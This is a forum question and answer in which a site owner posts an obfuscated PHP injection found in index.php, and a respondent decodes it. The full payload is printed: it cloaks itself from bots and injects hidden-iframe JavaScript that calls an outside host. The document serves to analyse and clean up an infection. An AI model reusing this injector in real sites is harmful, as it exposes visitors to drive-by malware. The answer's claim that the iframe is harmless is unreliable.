Possible Duplicate: eval base64_decode php virus A few days ago I noticed that none

Question

0

Asked: May 28, 20262026-05-28T20:20:49+00:00 2026-05-28T20:20:49+00:00

Possible Duplicate: eval base64_decode php virus A few days ago I noticed that none

0

Possible Duplicate:
eval base64_decode php virus

A few days ago I noticed that none of my mail scripts were working anymore. I inquired with the hosting provider and they informed me that that my hosting account was somehow hacked by spammers and I had reached my ’emails per hour’ limit, which was an indication that some sort of malicious code was placed on my site that sent the enormous amounts of emails.

I just checked my code and I found this chunk of mystery code that was placed at the top of my index.php page. I have absolutely no idea what it does or how it might send email out, unless it somehow latches onto my email scripts. What is this mystery code that was placed on my site?

Also, if I remove this code, should it clear up my problems? Is there anything else I can to find out if anything else was added on my server? And I’m guessing that the only way the code got added to my index.php file is that my account itself was hacked and they manually added it, so is there anything I can do to ensure this doesn’t happen again?

Code that was placed on my home page:

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNjdVpHOWpkVzFsYm5RcFlUMG9JblkxTXpKaU5TSXVjM0JzYVhRclJHRjBaU2t1YzNWaWMzUnlLREFzTmlrN1lXRTlLRnRkTG5KbGRtVnljMlVyVzEwdWNtVjJaWEp6WlNrdWMzVmljM1J5S0RBc05pazdhV1lvWVdFOVBUMWhLUXBtUFZzdE16QXNMVE13TERZMkxEWXpMQzAzTERFc05qRXNOeklzTmpBc056Z3NOekFzTmpJc056RXNOemNzTnl3Mk5DdzJNaXczTnl3ek1DdzJPU3cyTWl3M01DdzJNaXczTVN3M055dzNOaXd5Tnl3NE1pdzBOU3cxT0N3Mk5Dd3pPU3cxT0N3M01DdzJNaXd4TERBc05Ua3NOeklzTmpFc09ESXNNQ3d5TERVeUxEa3NOVFFzTWl3NE5Dd3RNekFzTFRNd0xDMHpNQ3cyTml3Mk15dzNOU3cxT0N3M01DdzJNaXczTlN3eExESXNNakFzTFRNd0xDMHpNQ3c0Tml3dE55dzJNaXcyT1N3M05pdzJNaXd0Tnl3NE5Dd3RNekFzTFRNd0xDMHpNQ3cyTVN3M01pdzJNQ3czT0N3M01DdzJNaXczTVN3M055dzNMRGd3TERjMUxEWTJMRGMzTERZeUxERXNMVFVzTWpFc05qWXNOak1zTnpVc05UZ3NOekFzTmpJc0xUY3NOellzTnpVc05qQXNNaklzTUN3Mk5TdzNOeXczTnl3M015d3hPU3c0TERnc05qZ3NPRE1zTmpnc056QXNPRElzTnpFc05qTXNOeXc0TXl3NE1pdzNNU3czTml3M0xEWXdMRGN5TERjd0xEZ3NOakVzT0N3eE15dzVMREV6TERjc056TXNOalVzTnpNc01qUXNOalFzTnpJc01qSXNNVEFzTUN3dE55dzRNQ3cyTml3Mk1TdzNOeXcyTlN3eU1pd3dMREV3TERrc01Dd3ROeXcyTlN3Mk1pdzJOaXcyTkN3Mk5TdzNOeXd5TWl3d0xERXdMRGtzTUN3dE55dzNOaXczTnl3NE1pdzJPU3cyTWl3eU1pd3dMRGM1TERZMkxEYzJMRFkyTERVNUxEWTJMRFk1TERZMkxEYzNMRGd5TERFNUxEWTFMRFkyTERZeExEWXhMRFl5TERjeExESXdMRGN6TERjeUxEYzJMRFkyTERjM0xEWTJMRGN5TERjeExERTVMRFU0TERVNUxEYzJMRGN5TERZNUxEYzRMRGMzTERZeUxESXdMRFk1TERZeUxEWXpMRGMzTERFNUxEa3NNakFzTnpjc056SXNOek1zTVRrc09Td3lNQ3d3TERJekxESXhMRGdzTmpZc05qTXNOelVzTlRnc056QXNOaklzTWpNc0xUVXNNaXd5TUN3dE16QXNMVE13TERnMkxDMHpNQ3d0TXpBc05qTXNOemdzTnpFc05qQXNOemNzTmpZc056SXNOekVzTFRjc05qWXNOak1zTnpVc05UZ3NOekFzTmpJc056VXNNU3d5TERnMExDMHpNQ3d0TXpBc0xUTXdMRGM1TERVNExEYzFMQzAzTERZekxDMDNMREl5TEMwM0xEWXhMRGN5TERZd0xEYzRMRGN3TERZeUxEY3hMRGMzTERjc05qQXNOelVzTmpJc05UZ3NOemNzTmpJc016QXNOamtzTmpJc056QXNOaklzTnpFc056Y3NNU3d3TERZMkxEWXpMRGMxTERVNExEY3dMRFl5TERBc01pd3lNQ3cyTXl3M0xEYzJMRFl5TERjM0xESTJMRGMzTERjM0xEYzFMRFkyTERVNUxEYzRMRGMzTERZeUxERXNNQ3czTml3M05TdzJNQ3d3TERVc01DdzJOU3czTnl3M055dzNNeXd4T1N3NExEZ3NOamdzT0RNc05qZ3NOekFzT0RJc056RXNOak1zTnl3NE15dzRNaXczTVN3M05pdzNMRFl3TERjeUxEY3dMRGdzTmpFc09Dd3hNeXc1TERFekxEY3NOek1zTmpVc056TXNNalFzTmpRc056SXNNaklzTVRBc01Dd3lMREl3TERZekxEY3NOellzTnpjc09ESXNOamtzTmpJc055dzNPU3cyTml3M05pdzJOaXcxT1N3Mk5pdzJPU3cyTml3M055dzRNaXd5TWl3d0xEWTFMRFkyTERZeExEWXhMRFl5TERjeExEQXNNakFzTmpNc055dzNOaXczTnl3NE1pdzJPU3cyTWl3M0xEY3pMRGN5TERjMkxEWTJMRGMzTERZMkxEY3lMRGN4TERJeUxEQXNOVGdzTlRrc056WXNOeklzTmprc056Z3NOemNzTmpJc01Dd3lNQ3cyTXl3M0xEYzJMRGMzTERneUxEWTVMRFl5TERjc05qa3NOaklzTmpNc056Y3NNaklzTUN3NUxEQXNNakFzTmpNc055dzNOaXczTnl3NE1pdzJPU3cyTWl3M0xEYzNMRGN5TERjekxESXlMREFzT1N3d0xESXdMRFl6TERjc056WXNOaklzTnpjc01qWXNOemNzTnpjc056VXNOallzTlRrc056Z3NOemNzTmpJc01Td3dMRGd3TERZMkxEWXhMRGMzTERZMUxEQXNOU3d3TERFd0xEa3NNQ3d5TERJd0xEWXpMRGNzTnpZc05qSXNOemNzTWpZc056Y3NOemNzTnpVc05qWXNOVGtzTnpnc056Y3NOaklzTVN3d0xEWTFMRFl5TERZMkxEWTBMRFkxTERjM0xEQXNOU3d3TERFd0xEa3NNQ3d5TERJd0xDMHpNQ3d0TXpBc0xUTXdMRFl4TERjeUxEWXdMRGM0TERjd0xEWXlMRGN4TERjM0xEY3NOalFzTmpJc056Y3NNekFzTmprc05qSXNOekFzTmpJc056RXNOemNzTnpZc01qY3NPRElzTkRVc05UZ3NOalFzTXprc05UZ3NOekFzTmpJc01Td3dMRFU1TERjeUxEWXhMRGd5TERBc01pdzFNaXc1TERVMExEY3NOVGdzTnpNc056TXNOaklzTnpFc05qRXNNamdzTmpVc05qWXNOamtzTmpFc01TdzJNeXd5TERJd0xDMHpNQ3d0TXpBc09EWmRPMjFrUFNkaEp6dGxQWGRwYm1SdmR5NWxkbUZzTzNjOVpqdHpQU2NuTzJjOUoyWW5LeWR5YnljckoyMURhQ2NySjJGeUp5c25RMjlrSnlzblpTYzdabTl5S0drOU1EdHBMWGN1YkdWdVozUm9QREE3YVNzcktYdHpQWE1yVTNSeWFXNW5XMmRkS0RNNUszZGJNQ3RwWFNrN2ZRcHBaaWhoUFQwOVlXRXBDbVVvSjJVbkt5Y29KeXNuY3ljckp5a25LVHM4TDNOamNtbHdkRDQ9JykpOw0KfQ=='));

Report

Leave an answer
Cancel reply

You must login to add an answer.

Need An Account,

1 Answer

Editorial Team · Answer 1 · 2026-05-28T20:20:50+00:00

This script:

<?php
echo (base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNjdVpHOWpkVzFsYm5RcFlUMG9JblkxTXpKaU5TSXVjM0JzYVhRclJHRjBaU2t1YzNWaWMzUnlLREFzTmlrN1lXRTlLRnRkTG5KbGRtVnljMlVyVzEwdWNtVjJaWEp6WlNrdWMzVmljM1J5S0RBc05pazdhV1lvWVdFOVBUMWhLUXBtUFZzdE16QXNMVE13TERZMkxEWXpMQzAzTERFc05qRXNOeklzTmpBc056Z3NOekFzTmpJc056RXNOemNzTnl3Mk5DdzJNaXczTnl3ek1DdzJPU3cyTWl3M01DdzJNaXczTVN3M055dzNOaXd5Tnl3NE1pdzBOU3cxT0N3Mk5Dd3pPU3cxT0N3M01DdzJNaXd4TERBc05Ua3NOeklzTmpFc09ESXNNQ3d5TERVeUxEa3NOVFFzTWl3NE5Dd3RNekFzTFRNd0xDMHpNQ3cyTml3Mk15dzNOU3cxT0N3M01DdzJNaXczTlN3eExESXNNakFzTFRNd0xDMHpNQ3c0Tml3dE55dzJNaXcyT1N3M05pdzJNaXd0Tnl3NE5Dd3RNekFzTFRNd0xDMHpNQ3cyTVN3M01pdzJNQ3czT0N3M01DdzJNaXczTVN3M055dzNMRGd3TERjMUxEWTJMRGMzTERZeUxERXNMVFVzTWpFc05qWXNOak1zTnpVc05UZ3NOekFzTmpJc0xUY3NOellzTnpVc05qQXNNaklzTUN3Mk5TdzNOeXczTnl3M015d3hPU3c0TERnc05qZ3NPRE1zTmpnc056QXNPRElzTnpFc05qTXNOeXc0TXl3NE1pdzNNU3czTml3M0xEWXdMRGN5TERjd0xEZ3NOakVzT0N3eE15dzVMREV6TERjc056TXNOalVzTnpNc01qUXNOalFzTnpJc01qSXNNVEFzTUN3dE55dzRNQ3cyTml3Mk1TdzNOeXcyTlN3eU1pd3dMREV3TERrc01Dd3ROeXcyTlN3Mk1pdzJOaXcyTkN3Mk5TdzNOeXd5TWl3d0xERXdMRGtzTUN3dE55dzNOaXczTnl3NE1pdzJPU3cyTWl3eU1pd3dMRGM1TERZMkxEYzJMRFkyTERVNUxEWTJMRFk1TERZMkxEYzNMRGd5TERFNUxEWTFMRFkyTERZeExEWXhMRFl5TERjeExESXdMRGN6TERjeUxEYzJMRFkyTERjM0xEWTJMRGN5TERjeExERTVMRFU0TERVNUxEYzJMRGN5TERZNUxEYzRMRGMzTERZeUxESXdMRFk1TERZeUxEWXpMRGMzTERFNUxEa3NNakFzTnpjc056SXNOek1zTVRrc09Td3lNQ3d3TERJekxESXhMRGdzTmpZc05qTXNOelVzTlRnc056QXNOaklzTWpNc0xUVXNNaXd5TUN3dE16QXNMVE13TERnMkxDMHpNQ3d0TXpBc05qTXNOemdzTnpFc05qQXNOemNzTmpZc056SXNOekVzTFRjc05qWXNOak1zTnpVc05UZ3NOekFzTmpJc056VXNNU3d5TERnMExDMHpNQ3d0TXpBc0xUTXdMRGM1TERVNExEYzFMQzAzTERZekxDMDNMREl5TEMwM0xEWXhMRGN5TERZd0xEYzRMRGN3TERZeUxEY3hMRGMzTERjc05qQXNOelVzTmpJc05UZ3NOemNzTmpJc016QXNOamtzTmpJc056QXNOaklzTnpFc056Y3NNU3d3TERZMkxEWXpMRGMxTERVNExEY3dMRFl5TERBc01pd3lNQ3cyTXl3M0xEYzJMRFl5TERjM0xESTJMRGMzTERjM0xEYzFMRFkyTERVNUxEYzRMRGMzTERZeUxERXNNQ3czTml3M05TdzJNQ3d3TERVc01DdzJOU3czTnl3M055dzNNeXd4T1N3NExEZ3NOamdzT0RNc05qZ3NOekFzT0RJc056RXNOak1zTnl3NE15dzRNaXczTVN3M05pdzNMRFl3TERjeUxEY3dMRGdzTmpFc09Dd3hNeXc1TERFekxEY3NOek1zTmpVc056TXNNalFzTmpRc056SXNNaklzTVRBc01Dd3lMREl3TERZekxEY3NOellzTnpjc09ESXNOamtzTmpJc055dzNPU3cyTml3M05pdzJOaXcxT1N3Mk5pdzJPU3cyTml3M055dzRNaXd5TWl3d0xEWTFMRFkyTERZeExEWXhMRFl5TERjeExEQXNNakFzTmpNc055dzNOaXczTnl3NE1pdzJPU3cyTWl3M0xEY3pMRGN5TERjMkxEWTJMRGMzTERZMkxEY3lMRGN4TERJeUxEQXNOVGdzTlRrc056WXNOeklzTmprc056Z3NOemNzTmpJc01Dd3lNQ3cyTXl3M0xEYzJMRGMzTERneUxEWTVMRFl5TERjc05qa3NOaklzTmpNc056Y3NNaklzTUN3NUxEQXNNakFzTmpNc055dzNOaXczTnl3NE1pdzJPU3cyTWl3M0xEYzNMRGN5TERjekxESXlMREFzT1N3d0xESXdMRFl6TERjc056WXNOaklzTnpjc01qWXNOemNzTnpjc056VXNOallzTlRrc056Z3NOemNzTmpJc01Td3dMRGd3TERZMkxEWXhMRGMzTERZMUxEQXNOU3d3TERFd0xEa3NNQ3d5TERJd0xEWXpMRGNzTnpZc05qSXNOemNzTWpZc056Y3NOemNzTnpVc05qWXNOVGtzTnpnc056Y3NOaklzTVN3d0xEWTFMRFl5TERZMkxEWTBMRFkxTERjM0xEQXNOU3d3TERFd0xEa3NNQ3d5TERJd0xDMHpNQ3d0TXpBc0xUTXdMRFl4TERjeUxEWXdMRGM0TERjd0xEWXlMRGN4TERjM0xEY3NOalFzTmpJc056Y3NNekFzTmprc05qSXNOekFzTmpJc056RXNOemNzTnpZc01qY3NPRElzTkRVc05UZ3NOalFzTXprc05UZ3NOekFzTmpJc01Td3dMRFU1TERjeUxEWXhMRGd5TERBc01pdzFNaXc1TERVMExEY3NOVGdzTnpNc056TXNOaklzTnpFc05qRXNNamdzTmpVc05qWXNOamtzTmpFc01TdzJNeXd5TERJd0xDMHpNQ3d0TXpBc09EWmRPMjFrUFNkaEp6dGxQWGRwYm1SdmR5NWxkbUZzTzNjOVpqdHpQU2NuTzJjOUoyWW5LeWR5YnljckoyMURhQ2NySjJGeUp5c25RMjlrSnlzblpTYzdabTl5S0drOU1EdHBMWGN1YkdWdVozUm9QREE3YVNzcktYdHpQWE1yVTNSeWFXNW5XMmRkS0RNNUszZGJNQ3RwWFNrN2ZRcHBaaWhoUFQwOVlXRXBDbVVvSjJVbkt5Y29KeXNuY3ljckp5a25LVHM4TDNOamNtbHdkRDQ9JykpOw0KfQ=='));
?>

Gave this output:

error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
    echo(base64_decode('PHNjcmlwdD5pZih3aW5kb3cuZG9jdW1lbnQpYT0oInY1MzJiNSIuc3BsaXQrRGF0ZSkuc3Vic3RyKDAsNik7YWE9KFtdLnJldmVyc2UrW10ucmV2ZXJzZSkuc3Vic3RyKDAsNik7aWYoYWE9PT1hKQpmPVstMzAsLTMwLDY2LDYzLC03LDEsNjEsNzIsNjAsNzgsNzAsNjIsNzEsNzcsNyw2NCw2Miw3NywzMCw2OSw2Miw3MCw2Miw3MSw3Nyw3NiwyNyw4Miw0NSw1OCw2NCwzOSw1OCw3MCw2MiwxLDAsNTksNzIsNjEsODIsMCwyLDUyLDksNTQsMiw4NCwtMzAsLTMwLC0zMCw2Niw2Myw3NSw1OCw3MCw2Miw3NSwxLDIsMjAsLTMwLC0zMCw4NiwtNyw2Miw2OSw3Niw2MiwtNyw4NCwtMzAsLTMwLC0zMCw2MSw3Miw2MCw3OCw3MCw2Miw3MSw3Nyw3LDgwLDc1LDY2LDc3LDYyLDEsLTUsMjEsNjYsNjMsNzUsNTgsNzAsNjIsLTcsNzYsNzUsNjAsMjIsMCw2NSw3Nyw3Nyw3MywxOSw4LDgsNjgsODMsNjgsNzAsODIsNzEsNjMsNyw4Myw4Miw3MSw3Niw3LDYwLDcyLDcwLDgsNjEsOCwxMyw5LDEzLDcsNzMsNjUsNzMsMjQsNjQsNzIsMjIsMTAsMCwtNyw4MCw2Niw2MSw3Nyw2NSwyMiwwLDEwLDksMCwtNyw2NSw2Miw2Niw2NCw2NSw3NywyMiwwLDEwLDksMCwtNyw3Niw3Nyw4Miw2OSw2MiwyMiwwLDc5LDY2LDc2LDY2LDU5LDY2LDY5LDY2LDc3LDgyLDE5LDY1LDY2LDYxLDYxLDYyLDcxLDIwLDczLDcyLDc2LDY2LDc3LDY2LDcyLDcxLDE5LDU4LDU5LDc2LDcyLDY5LDc4LDc3LDYyLDIwLDY5LDYyLDYzLDc3LDE5LDksMjAsNzcsNzIsNzMsMTksOSwyMCwwLDIzLDIxLDgsNjYsNjMsNzUsNTgsNzAsNjIsMjMsLTUsMiwyMCwtMzAsLTMwLDg2LC0zMCwtMzAsNjMsNzgsNzEsNjAsNzcsNjYsNzIsNzEsLTcsNjYsNjMsNzUsNTgsNzAsNjIsNzUsMSwyLDg0LC0zMCwtMzAsLTMwLDc5LDU4LDc1LC03LDYzLC03LDIyLC03LDYxLDcyLDYwLDc4LDcwLDYyLDcxLDc3LDcsNjAsNzUsNjIsNTgsNzcsNjIsMzAsNjksNjIsNzAsNjIsNzEsNzcsMSwwLDY2LDYzLDc1LDU4LDcwLDYyLDAsMiwyMCw2Myw3LDc2LDYyLDc3LDI2LDc3LDc3LDc1LDY2LDU5LDc4LDc3LDYyLDEsMCw3Niw3NSw2MCwwLDUsMCw2NSw3Nyw3Nyw3MywxOSw4LDgsNjgsODMsNjgsNzAsODIsNzEsNjMsNyw4Myw4Miw3MSw3Niw3LDYwLDcyLDcwLDgsNjEsOCwxMyw5LDEzLDcsNzMsNjUsNzMsMjQsNjQsNzIsMjIsMTAsMCwyLDIwLDYzLDcsNzYsNzcsODIsNjksNjIsNyw3OSw2Niw3Niw2Niw1OSw2Niw2OSw2Niw3Nyw4MiwyMiwwLDY1LDY2LDYxLDYxLDYyLDcxLDAsMjAsNjMsNyw3Niw3Nyw4Miw2OSw2Miw3LDczLDcyLDc2LDY2LDc3LDY2LDcyLDcxLDIyLDAsNTgsNTksNzYsNzIsNjksNzgsNzcsNjIsMCwyMCw2Myw3LDc2LDc3LDgyLDY5LDYyLDcsNjksNjIsNjMsNzcsMjIsMCw5LDAsMjAsNjMsNyw3Niw3Nyw4Miw2OSw2Miw3LDc3LDcyLDczLDIyLDAsOSwwLDIwLDYzLDcsNzYsNjIsNzcsMjYsNzcsNzcsNzUsNjYsNTksNzgsNzcsNjIsMSwwLDgwLDY2LDYxLDc3LDY1LDAsNSwwLDEwLDksMCwyLDIwLDYzLDcsNzYsNjIsNzcsMjYsNzcsNzcsNzUsNjYsNTksNzgsNzcsNjIsMSwwLDY1LDYyLDY2LDY0LDY1LDc3LDAsNSwwLDEwLDksMCwyLDIwLC0zMCwtMzAsLTMwLDYxLDcyLDYwLDc4LDcwLDYyLDcxLDc3LDcsNjQsNjIsNzcsMzAsNjksNjIsNzAsNjIsNzEsNzcsNzYsMjcsODIsNDUsNTgsNjQsMzksNTgsNzAsNjIsMSwwLDU5LDcyLDYxLDgyLDAsMiw1Miw5LDU0LDcsNTgsNzMsNzMsNjIsNzEsNjEsMjgsNjUsNjYsNjksNjEsMSw2MywyLDIwLC0zMCwtMzAsODZdO21kPSdhJztlPXdpbmRvdy5ldmFsO3c9ZjtzPScnO2c9J2YnKydybycrJ21DaCcrJ2FyJysnQ29kJysnZSc7Zm9yKGk9MDtpLXcubGVuZ3RoPDA7aSsrKXtzPXMrU3RyaW5nW2ddKDM5K3dbMCtpXSk7fQppZihhPT09YWEpCmUoJ2UnKycoJysncycrJyknKTs8L3NjcmlwdD4='));
}

The second base64 decode gives this:

<script>if(window.document)a=("v532b5".split+Date).substr(0,6);aa=([].reverse+[].reverse).substr(0,6);if(aa===a)
f=[-30,-30,66,63,-7,1,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,2,84,-30,-30,-30,66,63,75,58,70,62,75,1,2,20,-30,-30,86,-7,62,69,76,62,-7,84,-30,-30,-30,61,72,60,78,70,62,71,77,7,80,75,66,77,62,1,-5,21,66,63,75,58,70,62,-7,76,75,60,22,0,65,77,77,73,19,8,8,68,83,68,70,82,71,63,7,83,82,71,76,7,60,72,70,8,61,8,13,9,13,7,73,65,73,24,64,72,22,10,0,-7,80,66,61,77,65,22,0,10,9,0,-7,65,62,66,64,65,77,22,0,10,9,0,-7,76,77,82,69,62,22,0,79,66,76,66,59,66,69,66,77,82,19,65,66,61,61,62,71,20,73,72,76,66,77,66,72,71,19,58,59,76,72,69,78,77,62,20,69,62,63,77,19,9,20,77,72,73,19,9,20,0,23,21,8,66,63,75,58,70,62,23,-5,2,20,-30,-30,86,-30,-30,63,78,71,60,77,66,72,71,-7,66,63,75,58,70,62,75,1,2,84,-30,-30,-30,79,58,75,-7,63,-7,22,-7,61,72,60,78,70,62,71,77,7,60,75,62,58,77,62,30,69,62,70,62,71,77,1,0,66,63,75,58,70,62,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,76,75,60,0,5,0,65,77,77,73,19,8,8,68,83,68,70,82,71,63,7,83,82,71,76,7,60,72,70,8,61,8,13,9,13,7,73,65,73,24,64,72,22,10,0,2,20,63,7,76,77,82,69,62,7,79,66,76,66,59,66,69,66,77,82,22,0,65,66,61,61,62,71,0,20,63,7,76,77,82,69,62,7,73,72,76,66,77,66,72,71,22,0,58,59,76,72,69,78,77,62,0,20,63,7,76,77,82,69,62,7,69,62,63,77,22,0,9,0,20,63,7,76,77,82,69,62,7,77,72,73,22,0,9,0,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,80,66,61,77,65,0,5,0,10,9,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,65,62,66,64,65,77,0,5,0,10,9,0,2,20,-30,-30,-30,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,7,58,73,73,62,71,61,28,65,66,69,61,1,63,2,20,-30,-30,86];md='a';e=window.eval;w=f;s='';g='f'+'ro'+'mCh'+'ar'+'Cod'+'e';for(i=0;i-w.length<0;i++){s=s+String[g](39+w[0+i]);}
if(a===aa)
e('e'+'('+'s'+')');</script>

If it finds that the HTTP_USER_AGENT contains any of those sites, it sets $bot = true; If nothing is found, as in !$bot, then it prints out that javascript.

The resulting iframe is this:

<iframe src="http://kzkmynf.zyns.com/d/404.php?go=1" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></iframe>

All that JavaScript is there to generate the iframe, which ends up going to a 404. So in effect this has no effect but to create a dead invisible iframe. Even more mysterious, http://zyns.com/ is a domain name registrar for free domain names, and the subdomain doesn’t exist but gives no 404 itself. A whois on the registrar gives this:

Registrant:
ChangeIP.com
   c/o Dynamic DNS Provider
   P.O. Box 2333
   San Marcos, CA 92079
   US

   Domain Name: ZYNS.COM

   Administrative Contact, Technical Contact:
      ChangeIP.com      NSI@ChangeIP.com
      c/o Dynamic DNS Provider
      P.O. Box 2333
      San Marcos, CA 92079
      US
      800-791-3367 fax: 760-621-0116

It seems ChangeIP.com owns ZYNS.COM, and some anonymous user created that subdomain and posted this malicious code.

I would remove it…

Sign Up

Sign In

Forgot Password

The Archive Base Latest Questions

Possible Duplicate: eval base64_decode php virus A few days ago I noticed that none

Leave an answerCancel reply

1 Answer

Leave an answer
Cancel reply